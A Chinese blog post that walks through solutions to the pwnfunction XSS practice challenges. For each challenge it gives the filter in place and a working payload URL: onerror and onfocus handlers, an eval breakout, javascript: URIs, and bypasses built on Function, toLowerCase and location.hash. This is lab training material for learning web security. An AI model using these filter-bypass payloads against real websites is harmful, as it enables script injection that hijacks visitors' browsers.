xss靶场练习

最新推荐文章于 2024-08-20 00:37:59 发布
最新推荐文章于 2024-08-20 00:37:59 发布
阅读量313 收藏 7
点赞数 4
文章标签: xss 前端 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65857785/article/details/141291549
版权

1.Ma Spaghet!
2.Jefff
3.Ugandan Knuckles
4.Ricardo Milos
5.Ah That’s Hawt
7.Mafia
8.Ok,Boomer

1.Ma Spaghet!

该题用到了innerHTML,如果get参数somebody有值就传参,没有就使用默认的somebody

https://sandbox.pwnfunction.com/warmups/ma-spaghet.html?somebody=%3Cimg%20src=1%20οnerrοr=%22alert(1337)%22%3E

2.Jefff

把jeff传参到eval执行函数中了

https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=aa%22-alert(1337);-%22

3.Ugandan Knuckles

代码过滤了"<“和”>"

加入οnfοcus属性来执行alert()函数,发现能成功,但是需要用户手动点击

添加autofocus
最终成功告警
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaa" οnfοcus=alert(1337) autofocus="

4.Ricardo Milos

该代码会2秒后自动提交

没有过滤,尝试写入xss代码,警告成功

https://sandbox.pwnfunction.com/warmups/ricardo.html?ricardo=javascript:alert(1337)

5.Ah That’s Hawt

代码过滤了 “[” , “]” , “(” , “)”

将οnerrοr=location后成功警告

https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=<img src=1 οnerrοr=location=“javascript:alert%25281337%2529”>

7.Mafia

过滤了"" , " ’ " , ’ " ', " + " , " - " , " ! " , " \ " , " [ " , " ] ",还有alert

https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=eval(location.hash.slice(1))#alert(1337)

8.Ok,Boomer

https://sandbox.pwnfunction.com/warmups/ok-boomer.html?boomer=%3Ca%20id=ok%20href=%22cid:alert(1337)%22%3E

笙默43
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss靶场练习level 1-10
Mic_x_的博客
09-25 552
/''>5.弹窗。
XSS靶场练习
zlloveyouforever的博客
04-30 726
XSS-labs靶场练习前十关 很详细的哦
反射型XSS靶场练习
qq_58000413的博客
09-25 1073
DVWA靶场第一关:low 直接一条alert(1)看看结果,很简单直接过关 第二关:Medium 继续接着一条alert(1)看结果,没有弹窗,接着我们看下源码 看到前端源码后,发现好像给过滤了,这时候我们需要考虑下为什么过滤 这时我们可以尝试下是不是因为这个组合导致的,不出意外应该是的 这时候我们可以尝试没有的payload,或者将通过大小写绕过alert(
XSS靶场练习记录
weixin_54225453的博客
07-29 139
alert(1)
一个用于练习XSS靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
xss-lab靶场资源包
07-27
3. 挑战和练习靶场可能包含一系列难度递增的挑战,要求用户寻找并修复XSS漏洞,以强化理解和技能。 4. 学习资料:可能会附带相关的学习文档、教程或者视频,帮助用户更全面地理解XSS攻击原理和技术。 通过使用...
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
xss靶场详解
网安小菜鸡的博客
08-18 777
somebody=在svg加载完成以后执行我们的xss代码。因为这次使用的是innertext,他会把我们的标签整个识别成一个字符串输出就不能用一开始的。因为他利用innerHTML直接更新somebody参数,所以我们可以利用。是一个构造函数,用于动态创建一个新的函数。用于立即调用刚刚创建的函数。方法将字符串中的所有字母。是一个正则表达式,用于。
XSS-Jquery.html()+DOM破坏
最新发布
2301_78549931的博客
08-20 494
关于两种方式:Jquery.html()和innerHTMl的区别我们用示例来看。
XSS的DOM破坏
m0_67441173的博客
08-17 896
@keyframes x{}
XSS总结知识点+例题实操
代码其实很简单
08-19 642
XSS也是属于注入攻击的一类,他是通过构造一个JS代码,注入到网页中,由用户的浏览器来请求源码且运行达到攻击的效果;2、XSS的危害3、XSS产生的原因4、反射性XSS5、存储型XSS6、DOM的XSS8、XSS的防御及修复9、XSS很多时候就是一边测试性的输入一边查看html源码,可以通过查看源码查看系统对我构造的js注入做了什么防御;10、XSS的绕过2、DOM型XSS --向源html码中插入代码,破坏源DOM因为我们js中也有tel,cid等这些关键字/函数,那么当你在前端用这些关键字/函数的时候
XSS-过滤特殊符号的正则绕过
2301_78549931的博客
08-17 903
结果为数字8680439也就是说我们利用parseInt函数将关键字变为一串数字,但数字肯定无法运行,我们还需要再变回去,要将一个数字转换为特定的。
portswigger的Exploiting DOM clobbering to enable XSS
banliyaoguai的博客
08-18 1410
我们开始是没有头像的所以我们开始会走到window.defaultAvatar上,所以只要我们想办法构造一个 defaultAvatar.avatar就可以进行XSS了。所以下面构造的时候1后面要加双引号但是加双引号的时候会出现问题,无法闭合,我们尝试是用HTML实体编码。然后是用一个小技巧,是用一个不存在的伪协议,然后这个伪协议不存在,后面"就不会被编码。DOM破坏肯定是要看js的我们打开源码查看一下,发现了如下图的代码。然后我们借助一个js特性,看下面两张图id相同时不同的值的取法。
反射型XSS的几种payload
m0_70638961的博客
08-17 588
符合web的解码顺序,所以可以被执行。和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造 XSS Payload 即可。
xss.pwnfunction-Easy
banliyaoguai的博客
08-17 650
然后要获取prototype携带的toString方法,且不能是Object.prototype下的字符串方法,因为后者返回的是一个元素,我们需要的是可控的字符串。然后你是用上面的两个属性弹窗一个属性就会以字符串的形式展示href里面的值,如果你用的是从object继承来的toString,就会返回一个对象,例子如下。我们看到innerHTML可以想到使用img标签,然后看到过滤了括号我们可以尝试使用location,然后使用%25编码%绕过()它匹配字符串 "ALERT(1337)"。
xss靶场 pwnfunction WW3
banliyaoguai的博客
08-18 62
然后需要我们进入到刚刚分析的漏洞点,所以我们需要进入下图所示,但是只有当img图片加载成功才可以,所以我们需要再img传一个真值,且img标签中属性的执行是异步的所以在src加载的过程中,下面的text也会加载,然后才是onload加载,这样payload也加载到了memeGen里面。上面的例子就成了这样,其中script就逃逸出来了,然后中间的两个标签是替换后的标签,然后最上面的标签是innerHTML整出来的标签,然后第一个和第三个标签闭合了。过滤了以后再寻找新的注入点,看一下这里,漏洞点就在这里。
网络安全之XSS基础
huizhaohaha的博客
08-19 696
是RCDATA元素(RCDATA elements),可以容纳文本和字符引用,注意不能容纳其他元素,HTML解码得到<textarea><script>alert(5)</script>
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")</script>。 3. 提交输入或发送包含恶意代码的URL给目标网站。 4. 如果目标网站存在反射型XSS漏洞,恶意代码将会被执行,并弹出一个警告框,显示"XSS"。 5. 总结练习结果,了解反射型XSS漏洞的危害和防范措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值